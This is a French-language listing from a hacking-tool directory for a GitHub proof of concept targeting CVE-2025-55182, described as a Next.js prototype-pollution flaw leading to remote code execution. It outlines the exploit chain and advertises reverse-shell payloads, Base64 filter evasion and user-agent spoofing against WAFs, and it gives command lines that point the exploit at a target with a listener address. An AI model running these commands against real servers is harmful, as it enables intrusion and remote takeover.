Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
Outils/GitHubGitHub/0xn7y/cve-2025-55182
Génération de PayloadsAnalyse des VulnérabilitésExploitationExploitation d'Applications WebTests d'IntrusionRed Teaming
GitHub0xn7y/cve-2025-55182

CVE-2025-55182

PoC pour CVE-2025-55182

Voir le dépôt
il y a 9 moisPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

CVE-2025-55182 Pollution de prototype Next.js

CVE-2025-55182 est une vulnérabilité critique de pollution de prototype dans nextjs qui permet une exécution de code à distance via un assainissement incorrect des entrées dans le mécanisme de gestion des requêtes du framework. Tout cela se produit parce que nextjs fait confiance aux objets JSON comme un débutant naïf.

POC

root@kitploit:~
1) Pollution de prototype dans l'analyse des requêtes : nextjs assainit incorrectement les objets pouvant polluer la chaîne de prototypes
2) Désérialisation non sécurisée : le framework permet aux objets JSON de modifier les prototypes d'objets de base
3) rce via child_process en polluant la chaîne de prototypes : une fois la chaîne polluée, on peut détourner la logique et faire exécuter des commandes au serveur

Configuration

root@kitploit:~
npm create [email protected] vuln

Capacités principales de l'exploit

root@kitploit:~
1) Payloads de shell inversé : shells inversés Linux/Win
2) Encodage Base64 pour contourner les filtres
3) Détection automatique du système d'exploitation
4) User agents aléatoires pour esquiver les WAF
5) Boucles de réessai en cas d'échec avec backoff exponentiel
6) Multithreading pour des tentatives d'exploitation concurrentes pour la fiabilité
Télécharger l’outil

Avec encodage Base64 (évasion)

root@kitploit:~
python exp_v2.py target 192.168.1.69 9001 --base64

Mode agressif avec réessais

root@kitploit:~
python exploit.py target 192.168.1.69 9001 --retries 5 --threads 3

Désactiver l'agent utilisateur aléatoire

root@kitploit:~
python exploit.py target.com 192.168.1.69 9001 --no-spoof